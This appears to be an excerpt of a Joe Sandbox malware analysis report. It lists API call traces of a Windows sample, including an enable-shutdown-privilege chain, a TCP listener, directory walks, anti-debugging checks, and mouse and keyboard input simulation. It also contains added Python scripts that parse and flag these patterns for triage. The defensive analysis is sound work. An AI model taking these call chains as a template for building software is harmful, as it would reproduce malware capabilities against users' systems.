                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                                                                                                                            • String ID: %.3d
                                                                                                                                                                                                                                                            • API String ID: 3337348382-986655627
                                                                                                                                                                                                                                                            • Opcode ID: 0a350f2053e11ad4fca078a344001671bc93ed95471b7cb938d1a90ea4cd2050
                                                                                                                                                                                                                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a350f2053e11ad4fca078a344001671bc93ed95471b7cb938d1a90ea4cd2050
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                                                                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                            • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
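The per-function "APIs" blocks above are the most useful part of the report for triage, but they are printed as free text. The following parser is an added example written for this page; it is not part of Joe Sandbox or of the sample's code. It reads lines in exactly the form printed above (including the indented "Part of subcall function" variant), resolves the second SHGetFolderPathW argument to its CSIDL name using the constants from the Windows SDK shlobj.h, converts call-site addresses to RVAs using the "Offset: 00400000" image base shown in the Memory Dump Source block, and matches the ordered chain OpenProcessToken, LookupPrivilegeValueW(SeShutdownPrivilege), AdjustTokenPrivileges, then a shutdown API, which is the sequence seen at 004333CE through 00433479. The sample lines embedded in the block are copied from the two functions above and are the constructed input; the subsequence matcher is general and can be given any list of predicates.

```python
"""Parse Joe Sandbox 'APIs' lines and annotate two patterns from this report:
shell folders resolved via SHGetFolderPathW, and the enable-SeShutdownPrivilege
then shut-down call chain. Added example, not Joe Sandbox or sample code."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional

# Constructed input: lines copied verbatim from the report blocks above.
SAMPLE = """\
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
"""

# One report line: optional 'Part of subcall function XXXX:' prefix, then
# Api.MODULE, optional '(args)', then 'ref: ADDR'. Lines without parentheses
# (e.g. '__swprintf.LIBCMT ref: ...') are accepted too.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                  # raw argument tokens; '?' means unresolved
    ref: int                         # virtual address of the call site
    subcall_of: Optional[int] = None # callee start address for 'Part of subcall' lines

def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per parsable line; headings and other text are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

# CSIDL values from the Windows SDK (shlobj.h) for the folders this sample
# resolves. Flag bits such as CSIDL_FLAG_CREATE live in 0xFF00 and are masked off.
CSIDL = {
    0x05: "CSIDL_PERSONAL", 0x16: "CSIDL_COMMON_STARTMENU",
    0x17: "CSIDL_COMMON_PROGRAMS", 0x19: "CSIDL_COMMON_DESKTOPDIRECTORY",
    0x1F: "CSIDL_COMMON_FAVORITES", 0x23: "CSIDL_COMMON_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES", 0x2B: "CSIDL_PROGRAM_FILES_COMMON",
    0x2E: "CSIDL_COMMON_DOCUMENTS",
}

def folder_targets(calls: List[ApiCall]) -> List[str]:
    """Names of the shell folders resolved via SHGetFolderPathW, in call order."""
    names = []
    for c in calls:
        if c.api == "SHGetFolderPathW" and len(c.args) >= 2 and c.args[1] != "?":
            csidl = int(c.args[1], 16) & 0xFF
            names.append(CSIDL.get(csidl, f"CSIDL_0x{csidl:02X}"))
    return names

def find_sequence(calls: List[ApiCall],
                  steps: List[Callable[[ApiCall], bool]]) -> Optional[List[ApiCall]]:
    """Ordered-subsequence match: each predicate must match a call that comes
    after the previous match (unrelated calls may sit in between)."""
    matched, i = [], 0
    for c in calls:
        if i < len(steps) and steps[i](c):
            matched.append(c)
            i += 1
    return matched if i == len(steps) else None

SHUTDOWN_APIS = {"ExitWindowsEx", "InitiateSystemShutdownExW", "SetSystemPowerState"}

def shutdown_privilege_chain(calls: List[ApiCall]) -> Optional[List[ApiCall]]:
    """Token opened, SeShutdownPrivilege looked up and enabled, then a
    shutdown/reboot API: the chain at 004333CE..00433479 in this report."""
    return find_sequence(calls, [
        lambda c: c.api == "OpenProcessToken",
        lambda c: c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c.args,
        lambda c: c.api == "AdjustTokenPrivileges",
        lambda c: c.api in SHUTDOWN_APIS,
    ])

def rva(call: ApiCall, image_base: int = 0x400000) -> int:
    """Call-site RVA; 0x400000 is the 'Offset: 00400000' of the dump above."""
    return call.ref - image_base

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print("folders:", folder_targets(calls))
    chain = shutdown_privilege_chain(calls)
    if chain:
        print("shutdown chain ends at", chain[-1].api, "RVA", hex(rva(chain[-1])))
```

The CSIDL resolution is what turns the nine SHGetFolderPathW calls above into a readable list (Program Files, Common Files, the user's documents, then the all-users AppData, Desktop, Documents, Favorites, Programs and Start Menu directories). The sequence matcher is deliberately loose about intervening calls, so the GetCurrentProcess and GetLastError lines between the matched steps do not prevent a match.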
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
• String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove$_strncmp
• String ID: @oH$\$^$h
• API String ID: 2175499884-3701065813
• Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
• Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
• Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
• Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
APIs
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
• Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
• Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
• Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
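The socket/bind/listen call sites above, and the FindFirstFileW/FindNextFileW loop listed further down in this section, are easier to reason about once the trace lines are parsed and the constant arguments are decoded. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses the report's "APIs" lines (the sample lines are copied from this page), decodes socket() with the Winsock values AF_INET=2, SOCK_STREAM=1 and IPPROTO_TCP=6, and flags a socket, bind, listen sequence as a TCP listener. The function names, the ApiCall record and the finding labels are the example's own choices, not anything the report defines.

```python
"""Parse the 'APIs' trace lines of a Joe Sandbox function record and flag the
behaviour they encode. Added example; not part of the report or its tooling."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: trace lines copied from this report's listener function
# and its directory-walk function (bullets and indentation as rendered).
LISTENER_TRACE = """\
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
"""

DIRWALK_TRACE = """\
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
"""

# One trace line: optional bullet, optional "Part of subcall function X: ",
# then API.MODULE(args), ref: ADDR. Lines such as "_wcslen.LIBCMT ref: ..."
# carry no argument list, so the parenthesised group is optional.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Winsock constants needed to read socket(af, type, protocol).
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for a hex literal, None where the report shows '?'
    ref: int              # call-site address inside the dumped image
    subcall: Optional[int] = None


def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                       # skip anything that is not a trace line
            continue
        args = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def describe_socket(call: ApiCall) -> str:
    """Render socket()'s three constant arguments with their Winsock names."""
    af, typ, proto = call.args[:3]
    return "/".join((AF.get(af, f"af={af}"), SOCK_TYPE.get(typ, f"type={typ}"),
                     PROTO.get(proto, f"proto={proto}")))


def classify(calls: list) -> dict:
    """Flag behaviours from the set and address order of call sites.

    The report lists call sites by address, not in execution order, so the
    socket < bind < listen check is a heuristic that fits straight-line code."""
    names = [c.api for c in calls]
    findings = {}
    if all(n in names for n in ("socket", "bind", "listen")) and \
            names.index("socket") < names.index("bind") < names.index("listen"):
        sock = calls[names.index("socket")]
        bind = calls[names.index("bind")]
        listen = calls[names.index("listen")]
        findings["tcp_listener"] = {
            "socket": describe_socket(sock),
            "namelen": bind.args[2],        # 0x10 == sizeof(sockaddr_in)
            "backlog": listen.args[1],
            "ref": f"{listen.ref:08X}",
        }
    if "FindFirstFileW" in names and "FindNextFileW" in names:
        sleeps = [c.args[0] for c in calls if c.api == "Sleep" and c.args]
        findings["directory_walk"] = {"sleep_ms": sleeps}
    return findings


if __name__ == "__main__":
    for name, trace in (("listener", LISTENER_TRACE), ("dirwalk", DIRWALK_TRACE)):
        print(name, classify(parse_trace(trace)))
```

Two things the decoded output makes visible: the bind() namelen of 0x10 is sizeof(sockaddr_in), consistent with the AF_INET socket, and the listen() backlog is 5. The two closesocket call sites that each follow a WSAGetLastError are the error paths of bind and listen, which is why they sit between the calls in address order; treat the sequence check as a triage aid and confirm the actual control flow in the disassembly.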
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$XjH
• API String ID: 0-2872873767
• Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
• Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
• Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
• Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: *.*$\VH
                                                                                                                                                                                                                                                            • API String ID: 2786137511-2657498754
                                                                                                                                                                                                                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
• Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
• Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Strings
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
